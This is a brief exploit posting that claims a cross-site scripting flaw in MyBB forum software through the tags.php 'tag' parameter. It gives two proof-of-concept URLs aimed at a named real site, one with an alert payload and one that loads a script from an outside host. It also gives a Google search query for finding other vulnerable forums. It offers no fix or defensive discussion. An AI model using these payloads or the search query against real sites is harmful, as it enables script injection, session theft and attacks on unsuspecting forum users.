MyBB Cross Site Scripting
Posted on 14 December 2010
MyBB all version (tags.php?tag=) - Cross-Site Scripting (XSS) & HTML Injection http://www.mybb.com 12-12-2010 Poc: http://infectionsupport.com/tags.php?tag= "><script>alert(String.fromCharCode(88,83,83))</script> http://infectionsupport.com/tags.php?tag="><script src%3d//ckers.org/s ></script> Google dork: powered by mybb inurl:tags.php?tag= by Teamelite (Methodman) http://nemesis.te-home.net